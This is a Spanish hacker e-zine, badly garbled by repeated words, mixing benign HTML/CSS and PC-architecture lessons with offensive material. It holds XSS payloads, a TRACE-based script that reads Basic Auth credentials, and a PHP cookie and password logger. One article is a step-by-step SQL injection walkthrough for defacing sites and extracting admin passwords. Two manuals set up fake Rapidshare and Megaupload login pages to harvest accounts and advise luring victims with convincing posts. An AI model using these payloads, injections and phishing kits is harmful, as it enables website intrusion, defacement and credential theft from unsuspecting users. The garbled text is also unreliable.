<FK STYLE="behavior: url(http://tusitio/xss.htc);">
<DIV STYLE="background-image: url(javascript:alert('e-zine'))">
Usar estilos es increiblemente facil, y lo malo es que muchos filtros sonvulnerables. Se puede crear un DIV con background-image:url(javascript:eval(this.fu)) como estilo y añadir al DIV un campo llamado fu quecontenga el codigo a ejecutar, como por ejemplo alert(’anti-emo’):
<div fu="alert('anti-emo');"
STYLE="background-image: url(javascript:eval(this.fu))">
Ajax
Este es un tipo de XSS no tan conocido, pero peligroso. Se basa en usarcualquier tipo de vulnerabilidad para introducir un objeto XMLHTTP y usarlopara enviar contenido POST, GET, sin conocimiento del usuario.
El siguiente script de ejemplo obtiene el valor de las cabeceras de autenticacionde un sistema basado en Autenticacion Basica (Basic Auth). Solo faltadecodificarlo, pero es mas facil mandarlo codificado al registro de contraseñas.La codificacion es base64.Script para obtener credenciales en tipo BASIC
Esta tecnica tambien es llamada XSTXSTXST
XST
CrossCrossCross
Cross
SiteSiteSite
Site
TracingTracingTracing
Tracing
XSTXSTXST
XST
var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
// para firefox,
es: var xmlhttp = new XMLHttpRequest();
xmlhttp.open("TRACE","./",false);xmlhttp.send(null);
str1=xmlhttp.responseText;
splitString = str1.split("Authorization: Basic ");
str2=splitString[1];
str3=str2.match(/.*/)[0];
alert(str3);
Por cuestiones de seguridad.. Firefox y IExplorer 7 no permiten usar el metodoTRACE.log.php para registrar cookies
<?php$archivo = fopen('log2.htm','a');
$cookie = $_GET['c'];$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD:'.htmlentities(base64_decode($usuario)));
fwrite($archivo, '<br>Cookie: '.htmlentities($cookie).'<br>Pagina:'.htmlentities($re));
fwrite($archivo, '<br> IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
AutorAutorAutor
Autor
:::
:
MaxMaxMax
Max
p0werp0werp0wer
p0wer
”””
”
frozenfewfrozenfewfrozenfew
frozenfew
”””
”
CursoCursoCurso
Curso
BBB
B
ááá
á
sicosicosico
sico
dedede
de
ProgramaciProgramaciProgramaci
Programaci
óóó
ó
nnn
n
enenen
en
HTMLHTMLHTML
HTML
yyy
y
CSSCSSCSS
CSS
CONTENIDO
Introducción al lenguaje HTML
Que se necesita para hacer una página web
Composición del lenguaje
Estructura básica de un sitio web
Encabezados
Párrafos en HTML
Saltos de línea
Líneas Horizontales
Insertar imágenes en HTML
Atributo ALT
Uso de la etiqueta <a>
Hipervínculos a un lugar del mismo documento
Los Textos y sus atributos
Etiqueta <Font>
Listas en HTML
Comentarios en HTML
Creación de tablas en HTML
Formularios en HTML
Cajas de texto
Propiedades de las cajas de texto y atributos
Botones
Cajas de selección
Introducción a CSS
Que es CSS
Formas de usar CSS en un documento HTML
Comentarios en CSS
INTRODUCCIINTRODUCCIINTRODUCCI
INTRODUCCI
ÒÒÒ
Ò
NNN
N
ALALAL
AL
LENGUAJELENGUAJELENGUAJE
LENGUAJE
HTMLHTMLHTML
HTML
HTML (HyperText Markup Language), es un lenguaje para escribir páginas web,extremadamente fácil de aprender, ya que trabaja con etiquetas que procesan laosdiferentes módulos o componentes de un sitio web, estas etiquetas contienen losllamados atributos, que son los que hacen que el aspecto del modulo cambie.
QueQueQue
Que
sesese
se
necesitanecesitanecesita
necesita
paraparapara
para
hacerhacerhacer
hacer
unaunauna
una
ppp
p
ááá
á
ginaginagina
gina
web?web?web?
web?
Para crear un sitio web en HTML necesitamos de un editoreditoreditor
editor
podemos decir que el editormás fácil de conseguir es un editor de texto, en Windows se puede usar el notepadnotepadnotepad
notepad
,pero para facilitar las tareas podemos usar editores avanzados como lo son:
Microsoft Office FrontPage
Adobe Dreamweaver
Este último es bastante recomendado ya que posee características que ayudan en elmanejo, desarrollo y personalización del sitio web.
ComposiciComposiciComposici
Composici
óóó
ó
nnn
n
deldeldel
del
lenguajelenguajelenguaje
lenguaje
HTML es un lenguaje como ya hemos dicho que trabaja con etiquetas y atributos laforma correcta de escribir una etiqueta es:
<etiqueta><etiqueta><etiqueta>
<etiqueta>
Aquí va el texto </etiqueta></etiqueta></etiqueta>
</etiqueta>
Como se observa primer abrimos un psicoparentesis (< >) y lo cerramos dentro deestos va la etiqueta y por ultimo se utiliza la misma etiqueta para cerrar o finalizar peroesta vez con un “/” que indica el final de esta etiqueta.
EstructuraEstructuraEstructura
Estructura
bbb
b
ááá
á
sicasicasica
sica
dedede
de
ununun
un
sitiositiositio
sitio
webwebweb
web
Bien para indicar la estructura básica de un sitio web debemos casi siempre utilizaresta línea de etiquetas:
<html><html><html>
<html>
<head><head><head>
<head>
<title><title><title>
<title>
</title></title></title>
</title>
</head></head></head>
</head>
<body><body><body>
<body>
</body></body></body>
</body>
</html></html></html>
</html>
Explicación:
EncabezadosEncabezadosEncabezados
Encabezados
Los encabezados son los títulos de cada página dentro del documento, existen variosniveles de encabezados:
<h1> Encabezado<h2> Encabezado<h3> Encabezado<h4> Encabezado<h5> Encabezado<h6> Encabezado
PPP
P
ááá
á
rrafosrrafosrrafos
rrafos
enenen
en
HTMLHTMLHTML
HTML
Etiqueta Explicación<html> Indica el inicio de
un nuevodocumento html
<head> Indica la cabeceradel documento
<title> Allì se coloca eltitulo deldocumento
<body> Después de laetiqueta body vatodo el resto de lapágina webimágenes texto etc.
Bueno existen varias formas de crear espacios entre nuestros textos pero la formacorrecta de hacerlo es separar todo con párrafos, para ellos utilizamos la etiqueta <p>
<p> esto es un párrafo de prueba </p>
<p> Esto es otro párrafo </p>
Y si hacen la prueba verán que entre etiqueta hay espacios que separan los párrafos.
SaltosSaltosSaltos
Saltos
dedede
de
lll
l
ííí
í
neaneanea
nea
Muchas veces queremos separar alguna oración o alguna línea de texto o algún objetoque se encuentre en nuestra página para eso usamos los saltos de línea y la siguienteetiqueta al final de cada texto:
<br>
LineasLineasLineas
Lineas
horizontaleshorizontaleshorizontales
horizontales
Bueno una línea horizontal como ya su nombre lo indica es una llinea que separa lapágina para insertarla debes usar esta etiqueta:
<hr><hr><hr>
<hr>
InsertarInsertarInsertar
Insertar
imimim
im
ááá
á
genesgenesgenes
genes
enenen
en
HTMLHTMLHTML
HTML
Para insertar una imagen usamos la etiqueta <img><img><img>
<img>
Para insertar una imagen esta debe estar en la misma carpeta para usarlo de estaforma o escribir la ruta:
<img<img<img
<img
src=src=src=
src=
”””
”
ruta.gifruta.gifruta.gif
ruta.gif
”””
”
></img>></img>></img>
></img>
AtributoAtributoAtributo
Atributo
ALTALTALT
ALT
Generalmente muestra un Tooltip cuando se pone el curso en un link es decir insertacomo un texto descriptivo su modo de uso es el siguiente:
<img src=”imagen.gif” alt=”texto descriptivo”></img>
UsoUsoUso
Uso
dedede
de
lalala
la
etiquetaetiquetaetiqueta
etiqueta
<a><a><a>
<a>
Bueno la etiqueta <a> sirve para referirse a un link o una url, pero no funciona sola,debe tener ciertos atributos, por ejemplo:
<a href=http://level-23.org> Texto </a>
HipervHipervHiperv
Hiperv
ííí
í
nculosnculosnculos
nculos
aaa
a
ununun
un
lugarlugarlugar
lugar
deldeldel
del
mismomismomismo
mismo
documentodocumentodocumento
documento
Esto es a lo que llamamos anclas, con ellas puedes hacer que un link vaya a cierto lugarde un documento, la forma de hacerlo es sencilla:
<a name=”nombreancla”>Texto o titulo</a>
Y para hacer un link que vaya directamente a ese lugar del documento sencillamente:
<a href=”#nombreancla”>Texto o titulo </a>
Noten que para llamar el ancla usamos el símbolo “#”.
AutorAutorAutor
Autor
:::
:
GhostGhostGhost
Ghost
ManualManualManual
Manual
InyeccionInyeccionInyeccion
Inyeccion
SqlSqlSql
Sql
Hola, soy eDeex_. Creo que ya muchos me conocen, y hoy os voy a explicarsobre Deface, en concreto SQL injecction, y he decidido SQL injecction, por quées lo mas “fácil” de aprender, y por que la mayoría de las vulnerabilidades sonSQL.
& bueno, empecemos...
¿Qué es Deface?
El Deface / Defacing / Defacement es la modificación de una página web sinautorización del dueño de la misma.
La mayoría de las veces logran defacear un sitio consiguiendo acceso mediantealguna vulnerabilidad que el programador haya dejado en el mismo.También por passwords débiles, problemas en el FTP, etc.
¿Qué es SQL Inyección?
Inyección SQL es una vulnerabilidad informática en el nivel de la validación delas entradas a la base de datos de una aplicación. El origen es el filtradoincorrecto de las variables utilizadas en las partes del programa con códigoSQL. Es, de hecho, un error de una clase más general de vulnerabilidades quepuede ocurrir en cualquier lenguaje de programación o de script que estéincrustado dentro de otro.
¿Qué es un Dork?
Algo que usuarios malévolos escriben para encontrar máquinas vulnerablesBueno ara vamos a la práctica, hoy, os voy a enseñar a como defacear unawebsite mediante un bug SQL.
Primero hay que tener un buen dorks SQL, por ejemplo.
“allinurl: .php?id= “
Sin las comillas. Ese Dork es el más básico pero hay muchísimos más, todo escon tal de ir mirando.
Bueno ya hemos encontrado una, www.web.com/noticia.php?id=34
Ahora para saber si es vulnerable, le tenemos que quitar el 34, y ponerle ‘.Quedaría a si:
www.web.com/noticias.php?id=’
Si nos sale un error mysql , tipo este ;
Warning: mysql_error(): supplied argument is not a valid MySQL-Link resourcein /usr/home/xxxX/public_html/_sys/general_functions.php on line 5
No todos son así, pero tienen algo parecido. Bueno ya sabemos que esvulnerable ara toca poner inyección. Lo principal es;
-1+union+all+select+0,1
Quedaría así ;www.web.com/noticias.php?id=-1+union+all+select+0,1
Ara toca ir buscando, hasta que se te quite los errores, y te salgan números.Para ir buscando tienes que ir añadiendo números , ejemplo:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,4,5,6,7--
Siempre al final de cada numero pon “--“ [Dos guiones] sin las comillas.
No siempre acaba en 7, puede acabar en 100, 200, quien sabe.
A mí, me ha salido los números en 7, y me ha tirado el 4, 6 y 7.
Ahora toca coger uno de ellos, el que sea, yo cojo el 4.
Ara tenemos que hacer lo siguiente:
Si as elegido el 4, borras el numero 4 y pones “table_name” sin las comillas y alfinal pones;
+from+information_schema.tables—
Y nos quedaría a si:www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables—
Ahora se nos ha cambiado el 4 por CHARACTER_SETS. Que es lo que normalmente sale al principio. Ara nos toca buscar tablas como “admin, root, login,miembro, member, user, usuario, administrador, etc. “Y aviso, no es lo mismoadmin que Admin. Me explico, a lo mejor con admin no te sale y con Admin sí.
Para buscar las tablas tienes que borrar los dos guiones finales y poner ;
+1,1--
Y ir cambiando el primer 1 por los siguientes números, ejemplo:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+1,1--
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+2,1--
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,table_name,5,6,7+from+information_schema.tables+3,1--
A si hasta que te salga algo importante. Nunca suele pasar de 100 pero bueno,nunca se sabe.
A mí me ha tirado la tabla admin en 17. Ahora vamos hacer lo siguiente:
Borras +information_schema.tables+3,1-- , quedara a si:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,table_name,5,6,7+from
y pones +admin , pones admin por que es la tabla importante que te ha tirado,quedaría así:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,table_name,5,6,7+from+admin
& ara en table_name hay que ir probando palabras como; “Login, admin,password, clave, pass, user, email, mail , etc... “ Quedaría a si:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,admin,5,6,7+from+admin
A mí el user me lo ha tirado en “admin” y la contraseña en “clave”. Ahora borraslo que has puesto en 4, y pones :
concat(nombre,0x3a3a,pass)
Quedaría a si:
www.web.com/noticias.php?id=-1+union+all+select+0,1,2,3,concat(admin,0x3a3a,clave),5,6,7+from+admin
Os explico, admin es la tabla donde nos ha dado el usuario, 0x3a3a es :: enhexadecimal y clave es la tabla donde nos a tirado el password.
Y Listo ya tenemos usuario y password. Ahora toca buscar el panel que para míes lo más difícil :P
Hasta aquí hemos llegado amigos, mucha suerte y cuidaros, nos vemos porwww.level-23.com
AutorAutorAutor
Autor
:::
:
eDeex_eDeex_eDeex_
eDeex_
ARQUITECTURAARQUITECTURAARQUITECTURA
ARQUITECTURA
BBB
B
ÁÁÁ
Á
SICASICASICA
SICA
DEDEDE
DE
UNUNUN
UN
PCPCPC
PC
(COMPUTADOR)(COMPUTADOR)(COMPUTADOR)
(COMPUTADOR)
Saludos lectores, desde level-23 me place escribirles :P
Antes de nada, quiero avisarles que si no les gusta el mundo de la informática(no creo que sea este el caso jeje) no van a poder resistir este articulo, ya quees casi 100% teórico (cosa que a casi todos, incluido yo, nos suele aborrecer).Empecemos con el cacao…muchos de vosotros programareis, otro tantosqueréis aprender a programar, pero la mayoría de vosotros programareis sinsaber qué es lo que hace un PC, como funciona por dentro (no voy a explicarque un PC tiene una placa base, un procesador, memorias RAM, discos durosetc..eso supongo que lo sabes de serie xD) y esa es una de las claves paraprogramar bien y para que programar sea más sencillo ;).Bueno, desde tiempo memorables (yo aun no había nacido xD), concretamenteel año 1945 los ordenadores funcionan básicamente estos elementos:
- CPUCPUCPU
CPU
(Procesador): controlar y ejecutar todas las funciones de un PC---
-
Memoria:Memoria:Memoria:
Memoria:
su principal función es la de almacenar datos y código(programas)
- BUSBUSBUS
BUS
dedede
de
comunicaciones:comunicaciones:comunicaciones:
comunicaciones:
se encarga de operaciones de transferenciaprincipalmente
---
-
DispositivosDispositivosDispositivos
Dispositivos
dedede
de
E/S:E/S:E/S:
E/S:
dispositivos de entrada/salida
Ahora pasaré a explicar, en un orden para que todo sea comprensible y podáisunir lazos entre conceptos, los anteriores elementos.
1-Memoria:1-Memoria:1-Memoria:
1-Memoria:
2-2-2-
2-
BUSBUSBUS
BUS
dedede
de
comunicaciones:comunicaciones:comunicaciones:
comunicaciones:
La palabra BUS (lejos de referirse al peor presidente de la historia de los EEUUjeje), nos puede recordar a el transporte público, no estamos mal encaminados,pues esta es la función principal de el BUS, transportar operaciones. Tenemos 3tipos de buses fundamentales:
- BUS de Datos: transporta entre procesador, memoria y/o discos durosDATOS.
- BUS de Control: transporta información de control para un buenfuncionamiento de los elementos del PC.
- BUS de Direcciones: transporta la dirección virtual (dirección en memoria)donde se tiene que acceder.
3-3-3-
3-
DispositivosDispositivosDispositivos
Dispositivos
E/S:E/S:E/S:
E/S:
E(entrada); S(salida) son los periféricos, pueden funcionar de 3 maneras:
- E/S programada: el periférico realiza su operación mientras la CPU está100% en ese periférica hasta que no termina su operación.
- E/S por interrupciones: el procesador se ocupa al principio de laoperación del periférico y luego se dedica a otras cosas, hasta que elperiférico termina y el mismo procesador vuelve con el periférico pararealizar la operación.
E/S mediante DMA: la memoria virtual se sitúa sobre el periférico, lo cual liberaal procesador de la tarea de control y de estar presente en la transferencia de
datos.
Os pongo una tabla básica de referencia en operaciones lógicas
OP1
OP2
RESU
AND
OR XOR
0 0 0 0 0
Pasemos a ver la unidad de registros (registros…ummm, os acordáis de algo??)
UNIDAD DE REGISTROS: tachán!!!! Registros, aquel eslabón mas alto en lapirámide de memoria, de más rápido proceso y acceso pero de menoscapacidad, ahora vamos a explicar básicamente que son y cómo funcionan :PLas unidades de registros permiten al procesador estar libre de accedersiempre a memoria, y acceder a ellas más rápidamente, pero tienen en contra elque tienen muy poca capacidad (los que más usaremos son de 32 bits, pero hayde 64, de 16, etc.).Tenemos dos tipos de registros:
- Registros de propósito general:el programador los puede utilizar para almacenar datos, direcciones, etc.es decir, este tipo de registros son accesible al programador. EnEnsamblador será frecuente su uso (EAX, EBX, etc.).
- Registros de propósito específico:el programador no puede hace uso de ellos como hacía con los depropósito general, son usados por la CPU, en concreto por la Unidad deControl.Algunos ejemplos son:
IR: registro de instrucción PC: contiene la dirección de la próxima línea de código que se
ejecutará SR: indica el estado de alguna característica de la CPU MAR: comunica la CPU con el bus externo MDR: comunica la CPU con el bus de datos Como podemos ver en la imagen, los registros del micro son los
más rápidos, pero los que menos capacidad tienen; en cambio, lamemoria secundaria (discos duros, etc.…) es la más lenta pero laque más capacidad de almacenamiento tiene. Entre estos dos niveltenemos la memoria caché y la memoria principal (RAM).
El procesador se encarga de decidir qué información va a losniveles superiores (información que queremos que se proceserápido) pero tarde o temprano, lo que se aloja en los nivelessuperiores, al perder importancia baja a eslabones más bajos (porque pueden alojar más espacio).
Bueno, ahora vamos a explicar una concepto que a la mayoría ossonará y que es parte fundamental de los sistemas operativos:
LTDO
0 1 0 1 11 0 0 1 10 1 1 1 0
La Memoria Virtual: trata los dos niveles inferiores (memoriaprincipalRAM y memoria secundaria Discos duros) como unosolo.
Todos los programas que ejecutamos, se alojan en un espaciovirtual independiente, que, mediante el control de la CPU y del SO,no comparte con ningún otro programa.
Todo el espacio virtual se divide en páginas virtuales de 4Kb que seestructuran en una tabla de páginas, que nos indicará donde estánalojadas las páginas virtuales, en la memoria principal o en lasecundaria.
NOTA: todo programa, para ser ejecutado, necesita primero ser
cargado en la memoria principal (RAM).
Bueno, llegados aquí, varios habrán abandonado ya, para los que
hayan resistido el primer asedio, ara viene el segundo!! xD...
Ahora toca uno de los platos fuertes…
4-4-4-
4-
MicroprocesadorMicroprocesadorMicroprocesador
Microprocesador
(CPU):(CPU):(CPU):
(CPU):
Página 1
DISCO DUROPágina 2Página 3Página 4Página 5Página 6 RAMPágina 7
La CPU es la que ejecuta todos los cálculos y se encarga de controlar todo loocurrido, es decir, es el componente central del equipo (CPUUnidad Centralde Procesos).Consta de 3 partes fundamentales: la ALU, las unidades de registros y la unidadde control.
Paso a explicaros estas tres partes básicas de la CPU:
ALU: su nombre es Unidad Aritmético-Lógica, y como su nombre indica es laencargada de realizar operaciones aritméticas (suma, resta, división, etc…) yoperaciones lógicas (AND,OR,XOR,NOT…).Supongo que todo el mundo sabrá lo que son las operaciones aritméticas (seestudian en la escuela, o por lo menos se intenta xD), las que puede que noconozcáis son las operaciones lógicas.Estas son básicamente:
- AND: hecho a dos bits (1 o 0) devuelve 1 si los dos bits son 1- OR: devuelve 1 si uno de los bits es 1- XOR: da uno de los dos bits si uno es 1 y el otro 0
NOT: solo trabaja con un operando, lo invierte, por ejemplo, de 0 a 1.
UNIDAD DE CONTROL: estructura la ejecución de el código, es decir,CONTROLA la ejecución de la instrucción actual (IR) y obtiene la siguiente (PC).Regula el funcionamiento de la CPU.Cuando decimos controlar decimos que sigue este proceso (así por encima):
- Cuando ejecutamos una instrucción, la unidad de control la analizará ynos “dirá” qué hacer con ella y donde debe ser enviada para su proceso.
Bueno, bueno, bueno, con esto ya tendréis mareo garantizado para un buen ratojejej
Si queréis investigar no dudéis en preguntarlo, pero antes: “Google is yourfriend” ;)
Aquí doy por terminado el artículo este que os introducirá o os aclarará el:“cómo funciona una computadora?” y os dará vía libre para probar nuevascosas :P
Imagen sacada de google
AutorAutorAutor
Autor
:::
:
HaborHaborHabor
Habor
ManualManualManual
Manual
PhiserPhiserPhiser
Phiser
RapidshareRapidshareRapidshare
Rapidshare
200920092009
2009
PrimeroPrimeroPrimero
Primero
quequeque
que
nadanadanada
nada
debemosdebemosdebemos
debemos
tenertenertener
tener
ununun
un
hostinghostinghosting
hosting
paraparapara
para
alojaralojaralojar
alojar
losloslos
los
archivosarchivosarchivos
archivos
deldeldel
del
fake,aquifake,aquifake,aqui
fake,aqui
algunosalgunosalgunos
algunos
freefreefree
free
www.justfree.com
http://www.blackapplehost.com
http://www.000webhost.com/
Rapidshare Phisher by piejustice v1.3
http://www.megaupload.com/?d=I8JL55JA
Password level-23.com
BienBienBien
Bien
unaunauna
una
vezvezvez
vez
descargadodescargadodescargado
descargado
elelel
el
paquetepaquetepaquete
paquete
subimossubimossubimos
subimos
todostodostodos
todos
losloslos
los
archivosarchivosarchivos
archivos
alalal
al
hostinghostinghosting
hosting
AhoraAhoraAhora
Ahora
editamoseditamoseditamos
editamos
elelel
el
rs_pie_conf.phprs_pie_conf.phprs_pie_conf.php
rs_pie_conf.php
estaestaesta
esta
parteparteparte
parte
LaLaLa
La
primeraprimeraprimera
primera
linealinealinea
linea
eseses
es
paraparapara
para
guardarguardarguardar
guardar
losloslos
los
datosdatosdatos
datos
dedede
de
laslaslas
las
cuentascuentascuentas
cuentas
conconcon
con
masmasmas
mas
dedede
de
100001000010000
10000
puntospuntospuntos
puntos
(pueden(pueden(pueden
(pueden
cambiarcambiarcambiar
cambiar
elelel
el
nombrenombrenombre
nombre
deldeldel
del
archivoarchivoarchivo
archivo
.html).html).html)
.html)
LaLaLa
La
segundasegundasegunda
segunda
linealinealinea
linea
eseses
es
paraparapara
para
guardarguardarguardar
guardar
losloslos
los
datosdatosdatos
datos
dedede
de
laslaslas
las
cuentascuentascuentas
cuentas
conconcon
con
menosmenosmenos
menos
dedede
de
100001000010000
10000
puntospuntospuntos
puntos
(pueden(pueden(pueden
(pueden
cambiarcambiarcambiar
cambiar
elelel
el
nombrenombrenombre
nombre
deldeldel
del
archivoarchivoarchivo
archivo
.html).html).html)
.html)
LaLaLa
La
terceraterceratercera
tercera
linealinealinea
linea
eseses
es
lalala
la
passpasspass
pass
quequeque
que
nosnosnos
nos
pedirapedirapedira
pedira
paraparapara
para
entrarentrarentrar
entrar
enenen
en
elelel
el
adminadminadmin
admin
yyy
y
borrarborrarborrar
borrar
linkslinkslinks
links
uuu
u
otrasotrasotras
otras
cosascosascosas
cosas
(pueden(pueden(pueden
(pueden
cambiarcambiarcambiar
cambiar
elelel
el
nombrenombrenombre
nombre
)))
)
LaLaLa
La
cuartacuartacuarta
cuarta
linealinealinea
linea
eseses
es
elelel
el
securitysecuritysecurity
security
locklocklock
lock
dedede
de
rapidsharerapidsharerapidshare
rapidshare
masmasmas
mas
adelanteadelanteadelante
adelante
veremosveremosveremos
veremos
paraparapara
para
quequeque
que
eseses
es
yyy
y
sisisi
si
lololo
lo
quierenquierenquieren
quieren
tenertenertener
tener
truetruetrue
true
ooo
o
falsefalsefalse
false
(pueden(pueden(pueden
(pueden
cambiarcambiarcambiar
cambiar
elelel
el
nombrenombrenombre
nombre
)))
)
Bien,explicadoBien,explicadoBien,explicado
Bien,explicado
estoestoesto
esto
vamosvamosvamos
vamos
aaa
a
crearcrearcrear
crear
losloslos
los
linkslinkslinks
links
paraparapara
para
esoesoeso
eso
entramosentramosentramos
entramos
enenen
en
elelel
el
admin.phpadmin.phpadmin.php
admin.php
enenen
en
mimimi
mi
casocasocaso
caso
seraserasera
sera
http://www.level-23.com/test/admin.phphttp://www.level-23.com/test/admin.phphttp://www.level-23.com/test/admin.php
http://www.level-23.com/test/admin.php
VamosVamosVamos
Vamos
aaa
a
LinksLinksLinks
Links
PanelPanelPanel
Panel
yyy
y
ponemosponemosponemos
ponemos
CreateCreateCreate
Create
LinksLinksLinks
Links
lelele
le
damosdamosdamos
damos
aaa
a
Go!Go!Go!
Go!
AquiAquiAqui
Aqui
nosnosnos
nos
saldrasaldrasaldra
saldra
unaunauna
una
ventanaventanaventana
ventana
paraparapara
para
colocarcolocarcolocar
colocar
losloslos
los
linkslinkslinks
links
originalesoriginalesoriginales
originales
dedede
de
rapidsharerapidsharerapidshare
rapidshare
losloslos
los
pegamospegamospegamos
pegamos
asiasiasi
asi
LeLeLe
Le
damosdamosdamos
damos
aaa
a
CreateCreateCreate
Create
yyy
y
tendremostendremostendremos
tendremos
estosestosestos
estos
linkslinkslinks
links
yayaya
ya
modificadosmodificadosmodificados
modificados
conconcon
con
nuestronuestronuestro
nuestro
hostinghostinghosting
hosting
EstosEstosEstos
Estos
linkslinkslinks
links
yayaya
ya
sonsonson
son
losloslos
los
buenosbuenosbuenos
buenos
paraparapara
para
poderpoderpoder
poder
camuflarloscamuflarloscamuflarlos
camuflarlos
conconcon
con
elelel
el
http://urlteam.orghttp://urlteam.orghttp://urlteam.org
http://urlteam.org
O esta otra
http://lix.inhttp://lix.inhttp://lix.in
http://lix.in
LaLaLa
La
paginapaginapagina
pagina
fakefakefake
fake
seraserasera
sera
asiasiasi
asi
YYY
Y
lalala
la
otraotraotra
otra
dedede
de
premiumpremiumpremium
premium
seraserasera
sera
asiasiasi
asi
VoyVoyVoy
Voy
hacerhacerhacer
hacer
lalala
la
preubapreubapreuba
preuba
aaa
a
ververver
ver
sisisi
si
capturacapturacaptura
captura
losloslos
los
datosdatosdatos
datos
xDxDxD
xD
ParaParaPara
Para
ververver
ver
losloslos
los
datosdatosdatos
datos
capturadoscapturadoscapturados
capturados
vamosvamosvamos
vamos
alalal
al
panelpanelpanel
panel
dedede
de
adminadminadmin
admin
yyy
y
enenen
en
PasswordsPasswordsPasswords
Passwords
PanelPanelPanel
Panel
ponemosponemosponemos
ponemos
ViewViewView
View
PasswordsPasswordsPasswords
Passwords
ListListList
List
yyy
y
lelele
le
damosdamosdamos
damos
Go!Go!Go!
Go!
NosNosNos
Nos
pedirapedirapedira
pedira
lalala
la
passwordpasswordpassword
password
quequeque
que
cambiamoscambiamoscambiamos
cambiamos
alalal
al
principioprincipioprincipio
principio
PuesPuesPues
Pues
sisisi
si
funcionafuncionafunciona
funciona
perfecto,ahoraperfecto,ahoraperfecto,ahora
perfecto,ahora
vamosvamosvamos
vamos
aaa
a
ververver
ver
quequeque
que
eseses
es
lololo
lo
quequeque
que
salesalesale
sale
unaunauna
una
vezvezvez
vez
introducidosintroducidosintroducidos
introducidos
losloslos
los
datosdatosdatos
datos
paraparapara
para
descargardescargardescargar
descargar
elelel
el
linklinklink
link
EsEsEs
Es
paraparapara
para
quequeque
que
nosnosnos
nos
regalenregalenregalen
regalen
sususu
su
unlockunlockunlock
unlock
codecodecode
code
sisisi
si
lololo
lo
ponenponenponen
ponen
saldrasaldrasaldra
saldra
asiasiasi
asi
tambientambientambien
tambien
Account is Locked
PIN = 123654789
Y ya esta es bien facil,para que esto funcione bien y se piquen los usuarios deben decrear post reales con el primer link de fake,me refiero a post con explicacion +
imagenes para que parezca de verdad real,ya que si ponen los datos bien se lesredirecciona a la pagina real de rapidshare para poder desxcargar el archivo real asi
no se dan ni cuenta de pasaron por un fake al principo
AutorAutorAutor
Autor
:::
:
XtazisXtazisXtazis
Xtazis
ManualManualManual
Manual
PhiserPhiserPhiser
Phiser
MegauploadMegauploadMegaupload
Megaupload
200920092009
2009
EstaEstaEsta
Esta
claroclaroclaro
claro
quequeque
que
primeroprimeroprimero
primero
tienentienentienen
tienen
quequeque
que
tenertenertener
tener
ununun
un
hostinghostinghosting
hosting
paraparapara
para
poderpoderpoder
poder
alojaralojaralojar
alojar
losloslos
los
archivosarchivosarchivos
archivos
descargados,estedescargados,estedescargados,este
descargados,este
pasopasopaso
paso
lololo
lo
saltosaltosalto
salto
yayaya
ya
quequeque
que
seguroseguroseguro
seguro
quequeque
que
lololo
lo
sabensabensaben
saben
hacer,sirvehacer,sirvehacer,sirve
hacer,sirve
cualquiercualquiercualquier
cualquier
hostinghostinghosting
hosting
sisisi
si
nonono
no
tienetienetiene
tiene
publicidadpublicidadpublicidad
publicidad
muchomuchomucho
mucho
mejormejormejor
mejor
yayaya
ya
quequeque
que
sisisi
si
nonono
no
nadienadienadie
nadie
picara.picara.picara.
picara.
NosNosNos
Nos
descargamosdescargamosdescargamos
descargamos
elelel
el
PhiserPhiserPhiser
Phiser
desdedesdedesde
desde
aquiaquiaqui
aqui
http://www.megaupload.com/?d=XHJDZIMEhttp://www.megaupload.com/?d=XHJDZIMEhttp://www.megaupload.com/?d=XHJDZIME
http://www.megaupload.com/?d=XHJDZIME
Pass:Pass:Pass:
Pass:
level-23.comlevel-23.comlevel-23.com
level-23.com
SubimosSubimosSubimos
Subimos
losloslos
los
archivosarchivosarchivos
archivos
alalal
al
hostinghostinghosting
hosting
Bien,ahoraBien,ahoraBien,ahora
Bien,ahora
nosnosnos
nos
guiaremosguiaremosguiaremos
guiaremos
porporpor
por
esteesteeste
este
linklinklink
link
yayaya
ya
creadocreadocreado
creado
solosolosolo
solo
tenemostenemostenemos
tenemos
quequeque
que
modificarlomodificarlomodificarlo
modificarlo
aaa
a
nuestronuestronuestro
nuestro
gustogustogusto
gusto
paraparapara
para
quequeque
que
parezcaparezcaparezca
parezca
realrealreal
real
;la;la;la
;la
descargardescargardescargar
descargar
http://www.level-http://www.level-http://www.level-
http://www.level-
23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.
23.com/test/?file_name=NOCHE2.By.MX.part01.rar&file_description=NOCHE2.
By.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIUBy.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIUBy.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIU
By.MX.part01.rar&file_size=93.75%20MB&downloadID=UU4MWIIU
EsteEsteEste
Este
yayaya
ya
estaestaesta
esta
preparadopreparadopreparado
preparado
porporpor
por
m'im'im'i
m'i
conconcon
con
losloslos
los
datosdatosdatos
datos
quequeque
que
lelele
le
pusepusepuse
puse
paraparapara
para
hacerhacerhacer
hacer
esteesteeste
este
manual,lomanual,lomanual,lo
manual,lo
primeroprimeroprimero
primero
quequeque
que
tienentienentienen
tienen
quequeque
que
hacerhacerhacer
hacer
eseses
es
buscarsebuscarsebuscarse
buscarse
unaunauna
una
peliculapeliculapelicula
pelicula
ooo
o
algunalgunalgun
algun
juegojuegojuego
juego
quequeque
que
seanseansean
sean
nuevos,digonuevos,digonuevos,digo
nuevos,digo
estoestoesto
esto
porporpor
por
quequeque
que
paraparapara
para
quequeque
que
lalala
la
gentegentegente
gente
quequeque
que
tienentienentienen
tienen
